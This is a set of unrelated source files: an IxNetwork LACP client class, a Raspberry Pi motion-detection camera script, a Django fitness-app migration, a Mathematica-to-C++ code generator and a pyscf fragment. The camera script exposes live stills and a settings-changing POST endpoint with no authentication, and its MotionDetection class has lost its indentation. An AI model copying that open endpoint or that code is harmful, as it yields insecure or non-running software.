        Returns:
            obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.lacp.link.link.Link)
        Raises:
            NotFoundError: The requested resource does not exist on the server
            ServerError: The server has encountered an uncategorized error condition
        """
        from ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.lacp.link.link import Link
        return Link(self)

    @property
    def EnablePreservePartnerInfo(self):
        """If true, the fields of the previous link are updated.
        Returns:
            bool
        """
        return self._get_attribute('enablePreservePartnerInfo')
    @EnablePreservePartnerInfo.setter
    def EnablePreservePartnerInfo(self, value):
        self._set_attribute('enablePreservePartnerInfo', value)

    @property
    def Enabled(self):
        """If true, the Link Aggregation Control Protocol (LACP) is enabled.
        Returns:
            bool
        """
        return self._get_attribute('enabled')
    @Enabled.setter
    def Enabled(self, value):
        self._set_attribute('enabled', value)

    @property
    def IsLacpPortLearnedInfoRefreshed(self):
        """(read only) If true, the learned port information is up to date.
        Returns:
            bool
        """
        return self._get_attribute('isLacpPortLearnedInfoRefreshed')

    @property
    def RunningState(self):
        """The current running state of LACP.
        Returns:
            str(unknown|stopped|stopping|starting|started)
        """
        return self._get_attribute('runningState')

    def RefreshLacpPortLearnedInfo(self):
        """Executes the refreshLacpPortLearnedInfo operation on the server.
        This exec refreshes the LACP port learned information.
        Args:
            Arg1 (str(None|/api/v1/sessions/1/ixnetwork/vport?deepchild=lacp)): The method internally sets Arg1 to the current href for this instance
        Raises:
            NotFoundError: The requested resource does not exist on the server
            ServerError: The server has encountered an uncategorized error condition
        """
        # locals() here is {'self': ..., 'Arg1': ...}; the local variable name
        # 'Arg1' therefore becomes the payload key — do not rename it.
        Arg1 = self.href
        return self._execute('RefreshLacpPortLearnedInfo', payload=locals(), response_object=None)

    def SendMarkerRequest(self):
        """Executes the sendMarkerRequest operation on the server.
        This sends a marker request. The contents of the marker PDU contain the current view of partner (which can be defaulted if no partner is present). The marker will be sent regardless of which state the link is in.
        Args:
            Arg1 (str(None|/api/v1/sessions/1/ixnetwork/vport?deepchild=lacp)): The method internally sets Arg1 to the current href for this instance
        Raises:
            NotFoundError: The requested resource does not exist on the server
            ServerError: The server has encountered an uncategorized error condition
        """
        Arg1 = self.href
        return self._execute('SendMarkerRequest', payload=locals(), response_object=None)

    def SendUpdate(self):
        """Executes the sendUpdate operation on the server.
        This exec sends an update to the actor's partners after a change has been made to the link's parameters.
        Args:
            Arg1 (str(None|/api/v1/sessions/1/ixnetwork/vport?deepchild=lacp)): The method internally sets Arg1 to the current href for this instance
        Raises:
            NotFoundError: The requested resource does not exist on the server
            ServerError: The server has encountered an uncategorized error condition
        """
        Arg1 = self.href
        return self._execute('SendUpdate', payload=locals(), response_object=None)

    def Start(self):
        """Executes the start operation on the server.
        This exec starts the LACP protocol.
        Args:
            Arg1 (str(None|/api/v1/sessions/1/ixnetwork/vport?deepchild=lacp)): The method internally sets Arg1 to the current href for this instance
        Raises:
            NotFoundError: The requested resource does not exist on the server
            ServerError: The server has encountered an uncategorized error condition
        """
        Arg1 = self.href
        return self._execute('Start', payload=locals(), response_object=None)

    def StartPdu(self):
        """Executes the startPdu operation on the server.
        This exec starts PDUs related to LACP (for example, LACPDU, Marker Request PDU, Marker Response PDU) while the protocol is running on the port.
        Args:
            Arg1 (str(None|/api/v1/sessions/1/ixnetwork/vport?deepchild=lacp)): The method internally sets Arg1 to the current href for this instance
        Raises:
            NotFoundError: The requested resource does not exist on the server
            ServerError: The server has encountered an uncategorized error condition
        """
        Arg1 = self.href
        return self._execute('StartPdu', payload=locals(), response_object=None)

    def Stop(self):
        """Executes the stop operation on the server.
        This exec stops the LACP protocol.
        Args:
            Arg1 (str(None|/api/v1/sessions/1/ixnetwork/vport?deepchild=lacp)): The method internally sets Arg1 to the current href for this instance
        Raises:
            NotFoundError: The requested resource does not exist on the server
            ServerError: The server has encountered an uncategorized error condition
        """
        Arg1 = self.href
        return self._execute('Stop', payload=locals(), response_object=None)

    def StopPdu(self):
        """Executes the stopPdu operation on the server.
        This exec stops PDUs related to LACP (for example, LACPDU, Marker Request PDU, Marker Response PDU) while the protocol is running on the port.
        Args:
            Arg1 (str(None|/api/v1/sessions/1/ixnetwork/vport?deepchild=lacp)): The method internally sets Arg1 to the current href for this instance
        Raises:
            NotFoundError: The requested resource does not exist on the server
            ServerError: The server has encountered an uncategorized error condition
        """
        Arg1 = self.href
        return self._execute('StopPdu', payload=locals(), response_object=None)
|
<reponame>alanszlosek/hd-raspi-surveillance<gh_stars>1-10
import cv2
import datetime
import gpiozero
import http.server
import json
import math
import numpy
import os
import pathlib
import picamera
import requests
import signal
import socket
import subprocess
import threading
import time
import urllib
# Hi! Use this code to turn your Raspberry Pi into a surveillance camera.
# It records h264 videos when motion is detected
# It also contains a simple webpage where you can watch the live stream via JPEGs that refresh twice a second
#
# Regarding the output video, you'll need to join the before and after files together into an mp4 to view them. You can use ffmpeg to do this:
# ffmpeg -framerate 10 -i "concat:20201025060604_before.h264|20201025060604_after.h264" -c:v copy 20201025060604.mp4
# A raspi4 can handle 1088p 30fps and detect motion 2-3 times per second, while keeping CPU core usage around 80%!
# Default settings. If config.json is present, we'll merge in those values on start.
settings = {
    # raspi4 settings
    'fps': 30,
    'width': 1920,
    'height': 1088,
    # raspi zero settings (IIRC)
    #'fps': 30,
    #'width': 1280,
    #'height': 720,
    # Percentage of frame pixels that must change between checks to count as motion.
    'sensitivityPercentage': 0.2,
    # Check for motion at this interval. 0.3 (three times a second) is often frequent enough to pick up cars on a residential road, but it depends on many things. You'll need to fiddle.
    'secondsBetweenDetection': 0.3,
    # how many seconds of h264 to save prior to when motion is detected. this will be saved in a *_before.h264 file
    'secondsToSaveBeforeMotion': 2,
    # how many seconds of h264 to keep saving after the last detected motion
    'secondsToSaveAfterMotion': 2,
    # Host/port that receive this camera's heartbeat pings.
    'heartbeatServer': '192.168.1.173',
    'heartbeatPort': 5001,
    # Rectangular frame regions excluded from motion detection.
    'ignore': [
        # [startX, startY, endX, endY]
        [0, 0, 1920, 669],
        [0, 808, 1920, 1088]
    ]
}
class SplitFrames(object):
    """File-like sink for the camera's JPEG stream; keeps only the newest frame."""

    def __init__(self):
        # Most recent JPEG buffer handed to write(); None until the first frame.
        self.buf = None

    def write(self, buf):
        """Remember the latest JPEG buffer, warning if the JPEG magic bytes are missing."""
        jpeg_magic = b'\xff\xd8'
        if not buf.startswith(jpeg_magic):
            print('ERROR: buffer with JPEG data does not start with magic bytes')
        # Keep a reference to the buffer as given (no copy into a BytesIO stream);
        # the frame is stored even when the magic-byte check above failed.
        self.buf = buf
class MotionDetection:
def __init__(self, camera, settings, streamer):
    # Pre-allocates every per-frame working buffer once so the detection
    # loop avoids repeated allocations and GC churn.
    self.camera = camera
    self.settings = settings
    self.previousFrame = None
    # True while motion is considered ongoing.
    self.motionDetected = False
    # Timestamps driving the record/stop state machine (epoch seconds).
    self.motionAtTimestamp = 0
    self.checkAfterTimestamp = 0
    self.updateDetectStillAfterTimestamp = 0
    self.stopRecordingAfterTimestamp = 0
    self.stopRecordingAfterTimestampDelta = settings['secondsToSaveAfterMotion']
    # Create ndarrays ahead of time to reduce memory operations and GC
    # BGR frame buffer that camera captures are decoded into.
    self.decoded = numpy.empty( (self.settings['height'], self.settings['width'], 3), dtype=numpy.uint8)
    # The HTTP streamer serves this very array — it ALIASES self.decoded, so
    # the live view always shows the latest capture (and can race with an
    # in-progress capture; see the TODO in check()).
    streamer.httpd.still = self.decoded
    self.grayscale = numpy.empty( (self.settings['height'], self.settings['width']), dtype=numpy.uint8)
    self.previous = None
    self.diff = numpy.empty( (self.settings['height'], self.settings['width']), dtype=numpy.uint8)
    self.threshold = numpy.empty( (self.settings['height'], self.settings['width']), dtype=numpy.uint8)
    # Mask of 1s; config() zeroes out the regions listed in settings['ignore'].
    self.ignore = numpy.ones( (self.settings['height'], self.settings['width']), dtype=numpy.uint8)
    self.scratch = numpy.empty( (self.settings['height'], self.settings['width']), dtype=numpy.uint8)
    self.config(settings)
def config(self, settings):
self.sensitivityPercentage = self.settings['sensitivityPercentage'] / 100
# N% of white pixels signals motion
cutoff = math.floor(self.settings['width'] * self.settings['height'] * self.sensitivityPercentage)
# Pixels with motion will have a value of 255
# Sum the % of pixels having value of 255 to
self.cutoff = cutoff * 255
# Assemble an ndarray of our ignore regions. We'll multiply this by our current frame to zero-out pixels we want to ignore
for region in self.settings['ignore']:
x = region[0]
y = region[1]
while y < region[3]:
self.ignore[y, x:region[2]] = 0
y += 1
def check(self):
global streamer
self.camera.annotate_text = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
try:
# TODO: capture into a buffer not shared with the http streamer ...
# as-is we can have race-conditions
self.camera.capture(self.decoded, format='bgr', use_video_port=True)
t = time.time()
print('Checking for motion')
self._detect(t)
except Exception as e:
print('Exception within capture_continuous, bailing')
print(str(e))
def _detect(self, currentFrameTimestamp):
cv2.cvtColor(self.decoded, cv2.COLOR_BGR2GRAY, self.grayscale)
if self.previous is None:
self.previous = numpy.empty( (self.settings['height'], self.settings['width']), dtype=numpy.uint8)
numpy.copyto(self.previous, self.grayscale)
return False
cv2.absdiff(self.previous, self.grayscale, dst=self.diff)
numpy.multiply(self.ignore, self.diff, out=self.scratch)
# rely on numpy to ignore certain portions of the frame by multiplying those pixels by 0
cv2.threshold(self.scratch, 25, 255, cv2.THRESH_BINARY, self.threshold)
# Add up all pixels. Pixels with motion will have a value of 255
pixelSum = numpy.sum(self.threshold)
if pixelSum > self.cutoff: # motion detected in frame
# Log that we are seeing motion
self.motionDetected = True
self.motionAtTimestamp = currentFrameTimestamp
# Stop recording after 10 seconds of no motion
self.stopRecordingAfterTimestamp = currentFrameTimestamp + self.stopRecordingAfterTimestampDelta
print('Seeing motion. Will stop recording after %s' % str(self.stopRecordingAfterTimestamp))
# Let's only use the current frame for detection if it contains motion.
# The thought is that we want to detect very slow moving objects ... objects that might not trigger 2% of pixel changes within 1/3 second but that might over a longer time frame.
numpy.copyto(self.previous, self.grayscale)
# End conditional frame comparison logic
if self.motionDetected and self.stopRecordingAfterTimestamp < currentFrameTimestamp:
# Tell writer we haven't seen motion for a while
print("%d seconds without motion" % self.stopRecordingAfterTimestampDelta)
# Commented out the following so we preserve the timestamp of last motion
#self.motionAtTimestamp = 0
# Log that we are no longer seeing motion
self.motionDetected = False
class requestHandler(http.server.BaseHTTPRequestHandler):
    """HTTP API for the camera: serves the UI page, motion status JSON, the
    latest still frame, and accepts settings updates via POST /config.json."""

    def log_message(self, *args):
        # Suppress the default behavior of logging every incoming HTTP request to stdout
        return

    def do_POST(self):
        global settings
        url = urllib.parse.urlparse(self.path)
        path = url.path
        if path == '/config.json':
            contentLength = int(self.headers['Content-Length'])
            data = self.rfile.read(contentLength).decode('utf-8')
            o = json.loads(data)
            print('Updating settings', data)
            mergeConfig(o)
            self.send_response(200)
            self.send_header('Content-Type', 'application/json')
            self.end_headers()
            self.wfile.write(b"{}")
        else:
            # Fix: unknown POST paths previously got no response at all,
            # leaving the client hanging until timeout. Answer 404 instead.
            self.send_response(404)
            self.end_headers()

    def do_GET(self):
        url = urllib.parse.urlparse(self.path)
        path = url.path
        if path == '/':
            with open('index.html', 'r') as f:
                html = f.read()
            self.send_response(200)
            self.send_header('Content-Type', 'text/html')
            self.end_headers()
            self.wfile.write(html.encode())
        elif path == '/status.json':
            data = {
                'motion': motionDetection.motionDetected,
                'motionAtTimestamp': motionDetection.motionAtTimestamp
            }
            self.send_response(200)
            self.send_header('Content-Type', 'application/json')
            self.end_headers()
            self.wfile.write( json.dumps(data).encode() )
        elif path == '/still.jpeg':
            if self.wfile.closed or not self.wfile.writable():
                return
            if self.server.still is None:
                # Fix: no frame captured yet -- tell the client instead of
                # silently dropping the connection.
                self.send_response(404)
                self.end_headers()
                return
            # TODO: race condition alert. should not use a buffer that's being actively used by MotionDetection
            still = cv2.imencode('.jpg', self.server.still)[1]
            # send headers
            self.send_response(200)
            self.send_header('Content-Type', 'image/jpeg')
            self.send_header('Content-Length', len(still))
            self.end_headers()
            # Client may disconnect mid-transfer; both are expected and benign.
            try:
                self.wfile.write(still)
            except BrokenPipeError as e:
                print('BrokenPipeError')
            except ConnectionResetError as e:
                print('ConnectionResetError')
        else:
            # Fix: was `return False` with no response; send a real 404.
            self.send_response(404)
            self.end_headers()
class Streamer(threading.Thread):
    """Background thread running the control/monitoring HTTP server on :8080.

    The server object carries a ``still`` attribute that MotionDetection later
    points at the most recent decoded frame, backing /still.jpeg.
    """

    def __init__(self):
        super().__init__()
        self.outputs = []
        self.httpd = http.server.HTTPServer(('0.0.0.0', 8080), requestHandler)
        self.httpd.still = None  # assigned by MotionDetection once frames flow
        self.start()

    def run(self):
        # Blocks here until done() calls shutdown().
        self.httpd.serve_forever()

    def done(self):
        print('Streamer exiting')
        self.httpd.shutdown()
class Periodic(threading.Thread):
    """Base class for self-starting background workers.

    Stores *settings*, exposes a ``running`` flag that subclasses poll in
    their ``run()`` loop, and starts the thread immediately on construction.
    """

    def __init__(self, settings):
        super().__init__()
        self.settings = settings
        self.running = True  # cleared by done() to stop the worker loop
        self.start()

    def done(self):
        """Ask the worker loop to exit after its current iteration."""
        self.running = False
class Heartbeat(Periodic):
    """Sends a tiny UDP datagram every 2 s so a remote monitor can tell this
    camera is still alive."""
    def run(self):
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        while self.running:
            # Fire-and-forget datagram; the payload is irrelevant, arrival is the signal.
            sock.sendto(b"hi", (self.settings['heartbeatServer'], self.settings['heartbeatPort']))
            time.sleep(2)
class Temperature(Periodic):
    """Reports the Pi's CPU temperature to an InfluxDB server every 30 s."""
    def run(self):
        # NOTE(review): reuses the heartbeat host as the InfluxDB host --
        # confirm both services actually live on the same machine.
        influx_url = 'http://%s:8086/write' % (self.settings['heartbeatServer'],)
        while self.running:
            cpu = gpiozero.CPUTemperature()
            # InfluxDB line protocol. math.floor truncates to whole degrees even
            # though the field is then formatted as a float.
            s = 'raspi.temperature_celsius,host=%s value=%f %d' % (socket.gethostname(), math.floor(cpu.temperature), time.time_ns())
            # Blocking HTTP POST; a slow/unreachable server delays this loop.
            r = requests.post(influx_url, params={'db': 'cube'}, data=s)
            time.sleep(30)
def mergeConfig(o):
    """Merge dict *o* into the module-level ``settings`` and persist the result.

    Called from the HTTP POST handler; keys in *o* overwrite existing keys.
    Writes the merged settings to config.json so they survive a restart.
    """
    global settings
    # dict.update replaces the original manual key-by-key copy loop.
    settings.update(o)
    # The context manager closes the file; the old explicit f.close() inside
    # the `with` block was redundant and has been removed.
    with open('config.json', 'w') as f:
        json.dump(settings, f)
running = True
# Signal handler: flip `running` off so the capture loop below exits cleanly.
def signal_handler(sig, frame):
    global running
    running = False
    print('Exiting ...')
signal.signal(signal.SIGINT, signal_handler)
signal.signal(signal.SIGTERM, signal_handler)
# Merge in settings from config.json
# NOTE(review): this *replaces* the in-code settings dict wholesale rather than
# merging key-by-key -- a config.json missing newer keys will KeyError later.
if os.path.isfile('config.json'):
    with open('config.json', 'r') as f:
        settings = json.load(f)
        f.close()
with picamera.PiCamera() as camera:
    camera.resolution = (settings['width'], settings['height'])
    camera.framerate = settings['fps']
    # Black background behind the timestamp overlay text
    camera.annotate_background = picamera.Color(y=0, u=0, v=0)
    heartbeat = Heartbeat(settings)
    temperature = Temperature(settings)
    streamer = Streamer()
    motionDetection = MotionDetection(camera, settings, streamer)
    # See stream.copy_to() usage below for why I'm creating a larger buffer
    stream = picamera.PiCameraCircularIO(camera, seconds = settings['secondsToSaveBeforeMotion'] * 2)
    camera.start_recording(stream, format='h264')
    while running:
        try:
            # Need a better way to do this, based on how long capture() actually/usually takes
            # Hardcoded this to 0.1 for now, since capture() is slow and I want detection 3x per second
            camera.wait_recording(0.1) #settings['secondsBetweenDetection'])
        except picamera.PiCameraError as e:
            print('Exception while recording to circular buffer')
            print(str(e))
            break
        except Exception as e:
            print('Non PiCamera exception while recording to circular buffer')
            print(str(e))
            break
        # TODO: return boolean from check instead of reaching into motionDetection.motionDetected
        motionDetection.check()
        if motionDetection.motionDetected:
            print('Motion detected!')
            # As soon as we detect motion, split and start recording to h264
            # We'll save the circular buffer to h264 later, since it contains "before motion detected" frames
            filename = datetime.datetime.fromtimestamp(motionDetection.motionAtTimestamp).strftime('%Y%m%d%H%M%S_%%dx%%dx%%d') % (settings['width'], settings['height'], settings['fps'])
            # Recordings are grouped into one folder per day (YYYYMMDD prefix)
            subfolder = 'h264/' + filename[0:8]
            pathlib.Path(subfolder).mkdir(parents=True, exist_ok=True)
            try:
                camera.split_recording('%s/%s_after.h264' % (subfolder, filename))
            except picamera.PiCameraError as e:
                print('Exception while calling split_recording')
                print(str(e))
                break
            except Exception as e:
                print('Non PiCamera exception while calling split_recording')
                print(str(e))
                break
            # Wait until motion is no longer detected, then split recording back to the in-memory circular buffer
            while motionDetection.motionDetected:
                if running == False:
                    break
                try:
                    camera.wait_recording(1.0)
                except picamera.PiCameraError as e:
                    print('Exception while recording to h264 file')
                    print(str(e))
                    # TODO: Unsure how to handle full disk
                    break
                except Exception as e:
                    print('Non PiCamera exception while calling split_recording')
                    print(str(e))
                    break
                motionDetection.check()
            print('Motion stopped!')
            # Write the frames from "before" motion to disk as well
            try:
                # The reason I'm explicitly specifying seconds here is that according to the documentation,
                # even if you create a circular buffer to hold 2 seconds, that's the lower bound. It might hold more
                # depending on how much has changed between frames. Sounds like it allocates by bitrate behind the scenes,
                # and truncates based on bytes within the buffer. So if some frames have less data it'll be able to pack more into the buffer
                stream.copy_to('%s/%s_before.h264' % (subfolder, filename), seconds = settings['secondsToSaveBeforeMotion'])
            except Exception as e:
                print('Exception while calling copy_to')
                print(str(e))
                break
            stream.clear()
            try:
                camera.split_recording(stream)
            except picamera.PiCameraError as e:
                print('Exception while calling split_recording (2)')
                print(str(e))
                break
            except Exception as e:
                print('Non PiCamera exception while calling split_recording (2)')
                print(str(e))
                break
    # Shut down the worker threads before releasing the camera
    heartbeat.done()
    temperature.done()
    streamer.done()
    # TODO: find the proper way to wait for threads to terminate
    time.sleep(3)
    camera.stop_recording()
|
# Generated by Django 3.0.4 on 2020-03-24 11:15
import django.db.models.deletion
from django.conf import settings
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated initial schema for the rest_api app: user/admin profiles
    # layered on auth.User, plus exercises, meals/ingredients, workouts and
    # their relations. Do not hand-edit field definitions after it has run.
    initial = True
    dependencies = [
        ('auth', '0011_update_proxy_permissions'),
    ]
    operations = [
        migrations.CreateModel(
            name='CustomAdmin',
            fields=[
                ('auth_user',
                 models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, primary_key=True, serialize=False,
                                      to=settings.AUTH_USER_MODEL)),
                ('hospital', models.CharField(max_length=100)),
            ],
        ),
        migrations.CreateModel(
            name='CustomUser',
            fields=[
                ('auth_user',
                 models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, primary_key=True, serialize=False,
                                      to=settings.AUTH_USER_MODEL)),
                ('phone_number', models.CharField(blank=True, max_length=20, null=True)),
                ('photo', models.TextField(blank=True, null=True)),
                ('birth_date', models.DateField()),
            ],
        ),
        migrations.CreateModel(
            name='Exercise',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=50)),
                ('target_body_area', models.CharField(max_length=25)),
                ('difficulty', models.IntegerField()),
            ],
        ),
        migrations.CreateModel(
            name='Ingredient',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('calories', models.FloatField()),
                ('proteins', models.FloatField()),
                ('fat', models.FloatField()),
                ('carbs', models.FloatField()),
                ('name', models.CharField(max_length=30)),
            ],
        ),
        migrations.CreateModel(
            name='Meal',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=30)),
                ('category', models.CharField(max_length=30)),
            ],
        ),
        migrations.CreateModel(
            name='Set',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('number_of_reps', models.IntegerField()),
                ('time', models.FloatField()),
                ('exercise', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL,
                                               to='rest_api.Exercise')),
            ],
        ),
        # Client and Doctor extend CustomUser (one-to-one as primary key)
        migrations.CreateModel(
            name='Client',
            fields=[
                ('user',
                 models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, primary_key=True, serialize=False,
                                      to='rest_api.CustomUser')),
                ('height', models.FloatField()),
                ('current_weight', models.FloatField()),
                ('weight_goal', models.FloatField()),
            ],
        ),
        migrations.CreateModel(
            name='Doctor',
            fields=[
                ('user',
                 models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, primary_key=True, serialize=False,
                                      to='rest_api.CustomUser')),
                ('hospital', models.CharField(max_length=100)),
            ],
        ),
        # Quantity is the through-model linking Meal and Ingredient
        migrations.CreateModel(
            name='Quantity',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('quantity', models.FloatField()),
                (
                    'ingredient',
                    models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='rest_api.Ingredient')),
                ('meal', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='rest_api.Meal')),
            ],
        ),
        migrations.AddField(
            model_name='meal',
            name='ingredients',
            field=models.ManyToManyField(through='rest_api.Quantity', to='rest_api.Ingredient'),
        ),
        migrations.CreateModel(
            name='Workout',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('rest_time', models.DurationField()),
                ('difficulty', models.IntegerField()),
                ('workout_sets', models.ManyToManyField(to='rest_api.Set')),
                ('client', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='rest_api.Client')),
            ],
        ),
        migrations.CreateModel(
            name='MealHistory',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('day', models.DateField()),
                ('type_of_meal', models.CharField(max_length=25)),
                ('number_of_servings', models.FloatField()),
                ('meal', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='rest_api.Meal')),
                ('client', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='rest_api.Client')),
            ],
        ),
        migrations.AddField(
            model_name='meal',
            name='client',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE,
                                    to='rest_api.Client'),
        ),
        migrations.AddField(
            model_name='client',
            name='doctor',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL,
                                    to='rest_api.Doctor'),
        ),
    ]
|
#!/usr/bin/env python3
import os,re,sys, traceback
# read files of Mathematica equation exports
# change variable names to corresponding things in C
# insert things in the corresponding C file
class Inserter:
    """Reads Mathematica equation exports, rewrites the expressions into C
    syntax via the regex tables below, and prints numsolve.cpp with the
    generated code spliced in at placeholder markers (VARS, VARFUNC, ARGINIT,
    WRITEPARAMS, WRITEDATA, HEADERWRT, PATCHRECUR, REPVALRECUR, RELRECUR,
    SELGRADS, MATSPECIFY)."""
    # the file used in C
    filename_cpp = "numsolve.cpp"
    paramstruct_name = "paramstruct"
    # specify the filenames containing the exports
    # from Mathematica
    filename_precur = "patchrecurs.txt" # patch frequency recursions
    filename_repval = "repvals.txt" # the recursions of the reproductive values
    filename_related = "relatedness.txt" # the relatedness coefficients
    filename_selgrads = "selgrad.txt" # the selection gradients
    filename_vars= "variables.txt" # a file containing all the variables used
    filename_params = "params.txt" # a file containing all the parameters used
    # a list of regular expressions to transform Mathematica-expressions
    # to their C equivalents; relist[i] is replaced by sollist[i], so the two
    # lists must stay index-aligned.
    relist = ["r([am]{2,2})tplus1\((\d),(\d)\)","r([am]{2,2})\((\d),(\d)\)", "s\((\d)\)", "f\((\d),(\d)\)", "ftplus1\((\d),(\d)\)", "v\((\d),(a|m),(\d)\)", "vtplus1\((\d),(a|m),(\d)\)", "Power", "sqrt", "ϵ"]
    sollist = ["r\\1tplus1\\2\\3", "r\\1\\2\\3", "s\\1", "f\\1\\2", "ftplus1\\1\\2", "v\\1\\2\\3","vtplus1\\1\\2\\3", "pow", "sqrt","epsilon"];
    # replaces all the Mathematica variables in the file filename
    # with their C equivalents according to the regexps above
    def transform(self, filename):
        """Return the contents of *filename* with every relist pattern
        substituted by its sollist replacement, applied in list order."""
        # read in the file as a single string
        thefile = open(filename)
        contents = thefile.read()
        thefile.close()
        # replace all occurrence of any of the patterns above
        for i in range(0, len(self.relist)):
            contents = re.sub(re.compile(self.relist[i]),self.sollist[i],contents)
        # return file contents
        return(contents)
    # function that inserts variable definitions at the required
    # places
    def insert_variables(self, strvars, strfile):
        """Splice variable declarations (VARS) and the corresponding
        struct-unpacking lines (VARFUNC) into *strfile*."""
        # generate variable definition according to
        #double x = ((struct rparams *) params)->x;
        vardeffunc = re.sub("double\s(.*);","double \\1 = ((struct rparams *) params)->\\1;",strvars)
        strfile = re.sub("VARS","\n" + strvars,strfile)
        strfile = re.sub("VARFUNC","\n" + vardeffunc,strfile)
        return(strfile)
    # initialize the array of argc(x)
    # values at the start of the main() function
    # dependent on all the variables provided in vars(x)
    def initargument(self, strvars, strfile):
        """Replace ARGINIT with one `paramstruct.x = atof(argv[i])` line per
        variable; argv indexing starts at 2 (argv[1] is reserved)."""
        strvars_split = strvars.split("\n")
        initstruct = ""
        for i in range(0, len(strvars_split)):
            initstruct += re.sub("double\s(.*);","\t\t" + self.paramstruct_name + ".\\1 = atof(argv[" + str(i + 2) + "]);\n",strvars_split[i].strip())
        strfile = re.sub("ARGINIT","\n" + initstruct, strfile)
        return(strfile)
    # generate the contents of the write params function
    # arguments: strparams - \n-separated string with all the parameters
    # strfile: the C++ source to splice into
    def make_write_params_function(self, strparams, strfile):
        """Replace WRITEPARAMS with C++ that streams `name;value` lines for
        every parameter to DataFile."""
        # split the string of params
        strparams_split = strparams.split("\n")
        filling = "DataFile << endl << endl "
        for param in strparams_split:
            if param == "":
                continue
            param_s = re.sub("double\s(.*);","\\1", param)
            # get all the parameters into a string with C++ code
            filling += " << \"" + param_s + ";\" << " + param_s + " << endl\n"
        filling += " << endl;"
        strfile = re.sub("WRITEPARAMS","\n" + filling, strfile)
        return(strfile)
    # generate the contents of the write data function
    # strvars: string with all the variables, still with types (i.e., double...)
    # strparams: a string with all the parameters, still with types (i.e., double...)
    # strfile: the file to write it to
    def make_write_data_function(self, strvars, strparams, strfile):
        """Replace HEADERWRT with a semicolon-separated header line and
        WRITEDATA with the matching per-timestep output statement, covering
        variables that are not also parameters.

        NOTE(review): the set() difference makes the column order
        nondeterministic across runs -- header and data stay mutually
        consistent, but output files are not diffable run-to-run.
        """
        # split all the variables according to line
        strvars_split = strvars.split("\n")
        # split all the parameters according to the line
        strparams_split = strparams.split("\n")
        # get those variables that are not parameters
        strvars_split = list(set(strvars_split) - set(strparams_split))
        # get all the variables in a string with C++ code
        function_filling = "DataFile << time << \";\" << "
        data_headers = "DataFile << \"time;"
        for var in strvars_split:
            if var == "":
                continue
            var_clean = re.sub("double\s(.*);","\\1", var) # strip the double before the variable declaration
            var_clean = var_clean.strip()
            function_filling += var_clean + " << \";\" << \n"
            data_headers += var_clean + ";"
        function_filling += " endl;"
        data_headers += "\" << endl;"
        strfile = re.sub("HEADERWRT","\n" + data_headers, strfile)
        strfile = re.sub("WRITEDATA","\n" + function_filling, strfile)
        return(strfile)
    # to calculate the eigenvalue, we need to specify the matrix
    # and then use gsl_eigen_nonsymmv
    # however we need to prepare this, which is done in this function
    def insert_matrix(self, dimension, strfile):
        """Replace MATSPECIFY with a C array literal of entries a1_1..aN_N
        (row-major) for the GSL eigenvalue solver. Currently unused (see the
        commented-out call in __init__)."""
        strmat = "double data[] = {";
        for i in range(1,dimension+1):
            for j in range(1,dimension+1):
                strmat += "a" + str(i) + "_" + str(j) + ",\n";
        # cut off the trailing ",\n" that we needed in the for-loops
        strmat = strmat[0:-2]
        # add a closing curly bracket
        strmat += "};\n\n"
        # replace it where necessary in the file
        strfile = re.sub("MATSPECIFY","\n" + strmat, strfile)
        return(strfile)
    def __init__(self):
        """Run the whole pipeline: transform every export file and print the
        completed C++ source to stdout."""
        # transform all the files
        str_precur = self.transform(self.filename_precur)
        str_repval = self.transform(self.filename_repval)
        str_related = self.transform(self.filename_related)
        str_selgrads = self.transform(self.filename_selgrads)
        str_vars = self.transform(self.filename_vars)
        str_params = self.transform(self.filename_params)
        # open the c++ file
        cpp_f = open(self.filename_cpp)
        cpp_f_str = cpp_f.read()
        # put the contents of each of the Mathematica
        # file at their respective positions indicated in the c++ file
        cpp_f_str = re.sub("PATCHRECUR","\n" + str_precur,cpp_f_str)
        # cpp_f_str = re.sub("EVMAT","\n" + str_ev,cpp_f_str)
        cpp_f_str = re.sub("REPVALRECUR","\n" + str_repval,cpp_f_str)
        cpp_f_str = re.sub("RELRECUR","\n" + str_related,cpp_f_str)
        cpp_f_str = re.sub("SELGRADS","\n" + str_selgrads,cpp_f_str)
        # insert variable definitions
        cpp_f_str = self.insert_variables(str_vars, cpp_f_str)
        # insert matrix definition eigenvalue function
        # cpp_f_str = self.insert_matrix(4, cpp_f_str)
        cpp_f_str = self.initargument(str_vars, cpp_f_str)
        cpp_f_str = self.make_write_data_function(str_vars,str_params, cpp_f_str)
        cpp_f_str = self.make_write_params_function(str_params, cpp_f_str)
        print(cpp_f_str)
# Runs the pipeline at import time (this module is used as a script).
a = Inserter()
|
<gh_stars>1-10
import numpy as np
from scipy.spatial.transform import Rotation as R
from pyscf.symm.basis import _ao_rotation_matrices as aorm
#symmetry operations on bezene
def old_rotate_matrix(M, mol, atm_idx, ref_site=None):
